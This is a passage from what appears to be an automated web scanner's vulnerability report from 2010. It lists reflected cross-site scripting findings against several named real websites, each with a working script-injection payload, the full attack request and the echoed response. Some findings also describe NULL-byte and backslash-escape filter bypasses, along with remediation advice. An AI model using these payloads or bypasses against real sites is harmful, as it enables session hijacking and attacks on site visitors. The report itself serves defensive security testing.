<meta property="og:url" content="http://blogs.canoe.ca/vancouver2010/general/no-expo-for-edmonton-as-tories-keep-hiding-olympic-mess/?fa79e\"><script>alert(1)</script>334bc9a1cfe=1"/>
...[SNIP]...

2.32. http://blogs.constantcontact.com/commentary [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.constantcontact.com
Path:   /commentary

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de329"><script>alert(1)</script>ebcb993e5f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as de329\"><script>alert(1)</script>ebcb993e5f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /commentary?de329"><script>alert(1)</script>ebcb993e5f2=1 HTTP/1.1
Host: blogs.constantcontact.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:34:48 GMT
Server: Apache
X-Pingback: http://blogs.constantcontact.com/commentary/xmlrpc.php
Set-Cookie: ctctblog=1%3A%3A21510934; expires=Wed, 23-Feb-2011 03:34:48 GMT; path=/; domain=.constantcontact.com
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerP2_WPBlog=2151945226.20480.0000; path=/
Content-Length: 76734


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.o
...[SNIP]...
<a href="http://blogs.constantcontact.com/commentary/page/2/?de329\"><script>alert(1)</script>ebcb993e5f2=1">
...[SNIP]...

2.33. http://ca.indeed.com/Ajilon-Consulting-jobs-in-MontrĂ©al,-QC [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ca.indeed.com
Path:   /Ajilon-Consulting-jobs-in-Montr..al,-QC

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6ad1"><script>alert(1)</script>2e6b8afcfce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /Ajilon-Consulting-jobs-in-Montr..al,-QC?b6ad1"><script>alert(1)</script>2e6b8afcfce=1 HTTP/1.1
Host: ca.indeed.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:34:47 GMT
Server: Apache
Set-Cookie: CTK=15i0hhv010k4g69f; Domain=.indeed.com; Expires=Mon, 29-Nov-2027 22:23:18 GMT; Path=/
Set-Cookie: DCT=4; Expires=Thu, 25-Nov-2010 05:34:47 GMT; Path=/
Set-Cookie: JSESSIONID=E33A459A75B62221F93CD961A9C0B507.globalA_iad-web9; Path=/
Set-Cookie: PREF=; Domain=.indeed.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: PREF=ID=d21ff04a250a6822:TM=1290656087:NW=2:JF=1:L=Montr%C3%A9al%2C+QC; Expires=Mon, 29-Nov-2027 22:23:18 GMT; Path=/
Set-Cookie: RQ=q=Ajilon+Consulting&l=Montr%C3%A9al%2C+QC; Expires=Sat, 25-Dec-2010 03:34:47 GMT; Path=/
Set-Cookie: UD=ID=97b34c68c272e6cd:CV=1290656087:LA=1290656087:SG=97dcc2a7adf0d084315d9ecf8741392f; Expires=Mon, 29-Nov-2027 22:23:18 GMT; Path=/
Content-Language: en-CA
Vary: User-Agent,Accept-Encoding
Keep-Alive: timeout=8, max=9000
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Set-Cookie: NSC_hmpcbm_jbe=ffffffffaec9d30545525d5f4f58455e445a4a423662;expires=Thu, 25-Nov-2010 04:34:47 GMT;path=/;httponly
Content-Length: 51876


<html>
<head><title>Ajilon Consulting Jobs, Careers in Montr..al, QC | Indeed.com</title>
<meta http-equiv="content-type" content="text/html;charset=UTF-8">
<meta
...[SNIP]...
<input type="hidden" name="dest" value="/jobs?q=Ajilon+Consulting&l=Montr%C3%A9al,+QC&b6ad1"><script>alert(1)</script>2e6b8afcfce=1">
...[SNIP]...

2.34. http://chealth.canoe.ca/health_news_details.asp [news_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://chealth.canoe.ca
Path:   /health_news_details.asp

Issue detail

The value of the news_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71b6a"style%3d"x%3aexpression(alert(1))"ea638476782 was submitted in the news_id parameter. This input was echoed as 71b6a"style="x:expression(alert(1))"ea638476782 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /health_news_details.asp?news_id=3143571b6a"style%3d"x%3aexpression(alert(1))"ea638476782&news_channel_id=0 HTTP/1.1
Host: chealth.canoe.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Nov 2010 03:42:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 46301
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCQTAQCCC=PNLJCCLCIKIAPBODFNCNDNPG; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       
       <title>Health news - Healthcare in Canada - C-Health</title>
       <meta na
...[SNIP]...
ver/rate.gif';document.getElementById('TextRating').innerHTML='';" alt="Poor" coords="0,0,11,12" href="/channel_health_news_details.asp?channel_id=131&relation_id=1883&news_channel_id=131&news_id=3143571b6a"style="x:expression(alert(1))"ea638476782&rid=&article_rating=1#ratings">
...[SNIP]...

2.35. http://chealth.canoe.ca/health_news_details.asp [news_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://chealth.canoe.ca
Path:   /health_news_details.asp

Issue detail

The value of the news_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4049d"%3balert(1)//fde5c83bfe5 was submitted in the news_id parameter. This input was echoed as 4049d";alert(1)//fde5c83bfe5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /health_news_details.asp?news_id=314354049d"%3balert(1)//fde5c83bfe5&news_channel_id=0 HTTP/1.1
Host: chealth.canoe.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 25 Nov 2010 03:42:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 46187
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCQTAQCCC=MOLJCCLCNJMKHHFEAIPGGCJH; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       
       <title>Health news - Healthcare in Canada - C-Health</title>
       <meta na
...[SNIP]...
=errmsg[i]+"\n";
           }
           alert(messageout);
           
           return false;
       } else {
           
               x.action    = "/channel_health_news_details.asp?channel_id=131&relation_id=1883&news_channel_id=131&news_id=314354049d";alert(1)//fde5c83bfe5&rid=&&acomment=submit_article_comment#ratings";
           
           
           if(submit_type == "os"){
               return true;
           }else{
               x.submit();
           }
       }
   }
</script>
...[SNIP]...

2.36. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://dean.edwards.name
Path:   /weblog/2006/06/again/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %001b15e<a>345c8e79e91 was submitted in the REST URL parameter 1. This input was echoed as 1b15e<a>345c8e79e91 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /weblog%001b15e<a>345c8e79e91/2006/06/again/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 03:44:41 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1644
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>/404</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwardsoffline.appspot.com/c
...[SNIP]...
<a>345c8e79e91/">weblog%001b15e<a>345c8e79e91</a>
...[SNIP]...

2.37. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dean.edwards.name
Path:   /weblog/2006/06/again/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %009988d"><script>alert(1)</script>59f5c717b90 was submitted in the REST URL parameter 1. This input was echoed as 9988d"><script>alert(1)</script>59f5c717b90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /weblog%009988d"><script>alert(1)</script>59f5c717b90/2006/06/again/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 03:44:40 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1790
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>/404</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwardsoffline.appspot.com/c
...[SNIP]...
<a href="/weblog%009988d"><script>alert(1)</script>59f5c717b90/2006/">
...[SNIP]...

2.38. http://dean.edwards.name/weblog/2006/06/again/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://dean.edwards.name
Path:   /weblog/2006/06/again/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4ff30<a>59bd28133bd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /weblog/2006/06/again4ff30<a>59bd28133bd/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 25 Nov 2010 03:44:46 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Expires: Thu, 25 Nov 2010 03:44:46 GMT
Last-Modified: Thu, 25 Nov 2010 03:44:46 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1352
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>
<head>
<title>dean.edwards.name/weblog/</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwards
...[SNIP]...
</a>/again4ff30<a>59bd28133bd/</h1>
...[SNIP]...

2.39. http://dean.edwards.name/weblog/2006/06/again/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dean.edwards.name
Path:   /weblog/2006/06/again/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19452"><script>alert(1)</script>6e92e150851 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 19452\"><script>alert(1)</script>6e92e150851 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weblog/2006/06/again/?19452"><script>alert(1)</script>6e92e150851=1 HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:44:35 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Link: <http://dean.edwards.name/weblog/?p=75>; rel=shortlink
Expires: Thu, 25 Nov 2010 03:44:35 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 212431

<!doctype html>
<html>
<head>
<title>Dean Edwards: window.onload (again)</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://d
...[SNIP]...
<form class="contact" action="/weblog/2006/06/again/?19452\"><script>alert(1)</script>6e92e150851=1#preview" method="post">
...[SNIP]...

2.40. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/alex-trebek-is-a-jerk/65692001001 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.video.canoe.tv
Path:   /video/comedy/tv-bloopers/88729112001/alex-trebek-is-a-jerk/65692001001

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2208a<img%20src%3da%20onerror%3dalert(1)>9a836349a8 was submitted in the REST URL parameter 2. This input was echoed as 2208a<img src=a onerror=alert(1)>9a836349a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /video/comedy2208a<img%20src%3da%20onerror%3dalert(1)>9a836349a8/tv-bloopers/88729112001/alex-trebek-is-a-jerk/65692001001 HTTP/1.1
Host: en.video.canoe.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:47:03 GMT
Server: Apache
Set-Cookie: PHPSESSID=e64970dd4ea7722aa2c819925c7a2380; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=e64970dd4ea7722aa2c819925c7a2380; path=/; httponly
Set-Cookie: e64970dd4ea7722aa2c819925c7a2380=userdata%7Ca%3A5%3A%7Bs%3A19%3A%22video_name_urlified%22%3Bs%3A21%3A%22alex-trebek-is-a-jerk%22%3Bs%3A8%3A%22video_id%22%3Bi%3A65692001001%3Bs%3A11%3A%22page_number%22%3Bs%3A1%3A%221%22%3Bs%3A11%3A%22playlist_id%22%3Bs%3A11%3A%2288729112001%22%3Bs%3A16%3A%22default_video_id%22%3Bs%3A11%3A%2265692001001%22%3B%7D; path=/; httponly
POOL: videoserver-prod-02
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 72470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="medium" content
...[SNIP]...
<img src=a onerror=alert(1)>9a836349a8" id="crumb_section">Comedy2208a<img src=a onerror=alert(1)>9a836349a8</a>
...[SNIP]...

2.41. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/alex-trebek-is-a-jerk/65692001001 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.video.canoe.tv
Path:   /video/comedy/tv-bloopers/88729112001/alex-trebek-is-a-jerk/65692001001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc53b"><img%20src%3da%20onerror%3dalert(1)>e6dc10d55d7 was submitted in the REST URL parameter 2. This input was echoed as fc53b"><img src=a onerror=alert(1)>e6dc10d55d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /video/comedyfc53b"><img%20src%3da%20onerror%3dalert(1)>e6dc10d55d7/tv-bloopers/88729112001/alex-trebek-is-a-jerk/65692001001 HTTP/1.1
Host: en.video.canoe.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:46:22 GMT
Server: Apache
Set-Cookie: PHPSESSID=c5864ac043649b98143b5a8eb3f611c7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=c5864ac043649b98143b5a8eb3f611c7; path=/; httponly
Set-Cookie: c5864ac043649b98143b5a8eb3f611c7=userdata%7Ca%3A5%3A%7Bs%3A19%3A%22video_name_urlified%22%3Bs%3A21%3A%22alex-trebek-is-a-jerk%22%3Bs%3A8%3A%22video_id%22%3Bi%3A65692001001%3Bs%3A11%3A%22page_number%22%3Bs%3A1%3A%221%22%3Bs%3A11%3A%22playlist_id%22%3Bs%3A11%3A%2288729112001%22%3Bs%3A16%3A%22default_video_id%22%3Bs%3A11%3A%2265692001001%22%3B%7D; path=/; httponly
POOL: videoserver-prod-01
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 73132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="medium" content
...[SNIP]...
<a href="http://en.video.canoe.tv/video/comedyfc53bgtltimg-srca-onerroralert1gte6dc10d55d7/tv-bloopers/88729112001" title="Comedyfc53b"><img src=a onerror=alert(1)>e6dc10d55d7" id="crumb_section">
...[SNIP]...

2.42. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/alex-trebek-is-a-jerk/65692001001 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://en.video.canoe.tv
Path:   /video/comedy/tv-bloopers/88729112001/alex-trebek-is-a-jerk/65692001001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4e72f\'%3bab0f9db786f was submitted in the REST URL parameter 2. This input was echoed as 4e72f\\';ab0f9db786f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /video/comedy4e72f\'%3bab0f9db786f/tv-bloopers/88729112001/alex-trebek-is-a-jerk/65692001001 HTTP/1.1
Host: en.video.canoe.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:46:56 GMT
Server: Apache
Set-Cookie: PHPSESSID=2b09255c9be895f1b1266ff5177a6e54; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=2b09255c9be895f1b1266ff5177a6e54; path=/; httponly
Set-Cookie: 2b09255c9be895f1b1266ff5177a6e54=userdata%7Ca%3A5%3A%7Bs%3A19%3A%22video_name_urlified%22%3Bs%3A21%3A%22alex-trebek-is-a-jerk%22%3Bs%3A8%3A%22video_id%22%3Bi%3A65692001001%3Bs%3A11%3A%22page_number%22%3Bs%3A1%3A%221%22%3Bs%3A11%3A%22playlist_id%22%3Bs%3A11%3A%2288729112001%22%3Bs%3A16%3A%22default_video_id%22%3Bs%3A11%3A%2265692001001%22%3B%7D; path=/; httponly
POOL: videoserver-prod-01
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 72501

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="medium" content
...[SNIP]...
<![CDATA[

function OmnitureVariables(){
   this.mainsection = 'video';
   this.sectionLevel2 = 'Comedy4e72f\\';ab0f9db786f'; // modified by VIDEO APP
   this.sectionLevel3 = 'TV Bloopers'; // modified by VIDEO APP
   this.sectionLevel4 = 'Alex Trebek Is a Jerk'; // modified by VIDEO APP
   this.sectionLevel5 = '';
   this.section
...[SNIP]...

2.43. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/alex-trebek-is-a-jerk/65692001001 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.video.canoe.tv
Path:   /video/comedy/tv-bloopers/88729112001/alex-trebek-is-a-jerk/65692001001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd8f2"><img%20src%3da%20onerror%3dalert(1)>5c5ab24b88c was submitted in the REST URL parameter 3. This input was echoed as dd8f2"><img src=a onerror=alert(1)>5c5ab24b88c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /video/comedy/tv-bloopersdd8f2"><img%20src%3da%20onerror%3dalert(1)>5c5ab24b88c/88729112001/alex-trebek-is-a-jerk/65692001001 HTTP/1.1
Host: en.video.canoe.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:47:10 GMT
Server: Apache
Set-Cookie: PHPSESSID=6ad08adf747d572e4282304b3740bd34; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=6ad08adf747d572e4282304b3740bd34; path=/; httponly
Set-Cookie: 6ad08adf747d572e4282304b3740bd34=userdata%7Ca%3A5%3A%7Bs%3A19%3A%22video_name_urlified%22%3Bs%3A21%3A%22alex-trebek-is-a-jerk%22%3Bs%3A8%3A%22video_id%22%3Bi%3A65692001001%3Bs%3A11%3A%22page_number%22%3Bs%3A1%3A%221%22%3Bs%3A11%3A%22playlist_id%22%3Bs%3A11%3A%2288729112001%22%3Bs%3A16%3A%22default_video_id%22%3Bs%3A11%3A%2265692001001%22%3B%7D; path=/; httponly
POOL: videoserver-prod-01
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 72538

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="medium" content
...[SNIP]...
<a href="http://en.video.canoe.tv/video/comedy/tv-bloopersdd8f2"><img src=a onerror=alert(1)>5c5ab24b88c/88729112001/page/2">
...[SNIP]...

2.44. http://en.video.canoe.tv/video/comedy/tv-bloopers/88729112001/dumbest-answer-ever/62560578001 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://en.video.canoe.tv
Path:   /video/comedy/tv-bloopers/88729112001/dumbest-answer-ever/62560578001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96810\'%3bb61018c4722 was submitted in the REST URL parameter 2. This input was echoed as 96810\\';b61018c4722 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /video/96810\'%3bb61018c4722/tv-bloopers/88729112001/dumbest-answer-ever/62560578001 HTTP/1.1
Host: en.video.canoe.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 25 Nov 2010 03:47:37 GMT
Server: Apache
Set-Cookie: PHPSESSID=af3ba8bc2a1abc20369002dc549386ea; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=af3ba8bc2a1abc20369002dc549386ea; path=/; httponly
Set-Cookie: af3ba8bc2a1abc20369002dc549386ea=userdata%7Ca%3A5%3A%7Bs%3A19%3A%22video_name_urlified%22%3Bs%3A19%3A%22dumbest-answer-ever%22%3Bs%3A8%3A%22video_id%22%3Bi%3A62560578001%3Bs%3A11%3A%22page_number%22%3Bs%3A1%3A%221%22%3Bs%3A11%3A%22playlist_id%22%3Bs%3A11%3A%2288729112001%22%3Bs%3A16%3A%22default_video_id%22%3Bs%3A11%3A%2262560578001%22%3B%7D; path=/; httponly
POOL: videoserver-prod-02
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 72036

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="medium" content
...[SNIP]...
<![CDATA[

function OmnitureVariables(){
   this.mainsection = 'video';
   this.sectionLevel2 = '96810\\';b61018c4722'; // modified by VIDEO APP
   this.sectionLevel3 = 'TV Bloopers'; // modified by VIDEO APP
   this.sectionLevel4 = 'Dumbest Answer Ever'; // modified by VIDEO APP
   this.sectionLevel5 = '';
   this.sectionLe
...[SNIP]...

